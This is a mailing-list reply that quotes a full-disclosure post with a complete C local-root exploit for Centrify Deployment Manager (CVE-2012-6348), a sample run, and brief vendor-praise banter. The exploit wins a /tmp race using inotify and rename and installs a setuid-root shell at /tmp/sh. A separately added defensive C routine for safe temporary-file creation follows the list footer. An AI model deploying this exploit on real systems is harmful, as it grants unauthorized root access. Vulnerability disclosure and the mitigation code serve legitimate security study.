Re: [Full-disclosure] Local root exploit for Centrify Deployment Manager < v2.1.0.283 local root



These guys were really cool about it, probably one of the best vendor responses I've gotten. I am seeing if
I can go to the next iteration of training. =->

On Dec 18, 2012, at 12:51 PM, Jeffrey Walton <noloader@xxxxxxxxx> wrote:

> I've got a feeling you will not be sent to anymore vendor classes :)
>
> On Tue, Dec 18, 2012 at 3:49 PM, Larry W. Cashdollar <larry0@xxxxxx> wrote:
> > /*Local root exploit for Centrify Deployment Manager v2.1.0.283 local root,
> > Centrify released a fix very quickly - nice vendor response.
> >
> > http://vapid.dhs.org/exploits/centrify_local_r00t.c
> >
> > CVE-2012-6348 12/17/2012
> > http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html
> > Greetings vladz, Thanks for the inotify & syscall technique.
> >
> > This exploit based on http://vladz.devzero.fr/010_bzexe-vuln.php
> >
> > Run the exploit and wait for administrator to analyse or deploy software
> > to the system.
> >
> > larry@h0g:~/code/exploit$ ./cent_root centrify.cmd.0
> > [*] Launching attack against "centrify.cmd.0"
> > [+] Creating evil script (/tmp/evil)
> > [+] Creating target file (/bin/touch /tmp/centrify.cmd.0)
> > [+] Initialize inotify
> > [+] Waiting for root to launch "centrify.cmd.0"
> > [+] Opening root shell (/tmp/sh)
> > #
> >
> > Larry W. Cashdollar
> > @_larry0
> > */
> >
> >
> > #include <stdlib.h>
> > #include <stdio.h>
> > #include <unistd.h>
> > #include <sys/stat.h>
> > #include <sys/types.h>
> > #include <string.h>
> > #include <sys/inotify.h>
> > #include <fcntl.h>
> > #include <sys/syscall.h>
> >
> > /*Create a small c program to pop us a root shell*/
> > int create_nasty_shell(char *file) {
> >     char *s = "#!/bin/bash\n"
> >               "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
> >               "cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
> >               "chmod 4755 /tmp/sh;\n";
> >
> >     int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
> >     write(fd, s, strlen(s));
> >     close(fd);
> >
> >     return 0;
> > }
> >
> >
> > int main(int argc, char **argv) {
> >     int fd, wd;
> >     char buf[1], *targetpath, *cmd,
> >          *evilsh = "/tmp/evil", *trash = "/tmp/trash";
> >
> >     if (argc < 2) {
> >         printf("Usage: %s <target file> \n", argv[0]);
> >         return 1;
> >     }
> >
> >     printf("[*] Launching attack against \"%s\"\n", argv[1]);
> >
> >     printf("[+] Creating evil script (/tmp/evil)\n");
> >     create_nasty_shell(evilsh);
> >
> >     targetpath = malloc(sizeof(argv[1]) + 6);
> >     cmd = malloc(sizeof(char) * 32);
> >     sprintf(targetpath, "/tmp/%s", argv[1]);
> >     sprintf(cmd,"/bin/touch %s",targetpath);
> >     printf("[+] Creating target file (%s)\n",cmd);
> >     system(cmd);
> >
> >     printf("[+] Initialize inotify\n");
> >     fd = inotify_init();
> >     wd = inotify_add_watch(fd, targetpath, IN_ATTRIB);
> >
> >     printf("[+] Waiting for root to change perms on \"%s\"\n", argv[1]);
> >     syscall(SYS_read, fd, buf, 1);
> >     syscall(SYS_rename, targetpath, trash);
> >     syscall(SYS_rename, evilsh, targetpath);
> >
> >     inotify_rm_watch(fd, wd);
> >
> >     printf("[+] Opening root shell (/tmp/sh)\n");
> >     sleep(2);
> >     system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
> >
> >     return 0;
> > }
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
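
The quoted code pre-creates a predictably named file in world-writable /tmp and swaps it by rename once root changes its permissions. As an added defensive example (not code from the post, its author or Centrify), this C routine shows the mitigation side: a privileged tool writing its script into a fresh private directory with an exclusive create and descriptor-based checks. The function names and the /tmp/deploy. prefix are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Exclusive create: fails with EEXIST if the name already exists, including
 * a file or symlink planted beforehand by another local user. */
int open_exclusive(const char *path, mode_t mode) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, mode);
}

/* Write `script` to <private dir>/<name>. The directory comes from mkdtemp()
 * (mode 0700, owned by the caller), so no other user can create, rename or
 * replace entries in it. Stores the path in `out`; returns 0 or -1. */
int write_private_script(const char *name, const char *script,
                         char *out, size_t outlen) {
    char dir[] = "/tmp/deploy.XXXXXX";   /* hypothetical prefix */
    size_t len = strlen(script);
    struct stat st;
    int fd = -1;

    if (strchr(name, '/') != NULL)       /* plain file names only */
        return -1;
    if (mkdtemp(dir) == NULL)
        return -1;
    if (snprintf(out, outlen, "%s/%s", dir, name) >= (int)outlen)
        goto fail;
    if ((fd = open_exclusive(out, 0700)) < 0)
        goto fail;
    /* Check and chmod through the descriptor, never through the path. */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        st.st_uid != geteuid() || fchmod(fd, 0700) < 0 ||
        write(fd, script, len) != (ssize_t)len)
        goto fail;
    return close(fd);
fail:
    if (fd >= 0) { close(fd); unlink(out); }
    rmdir(dir);
    return -1;
}
```
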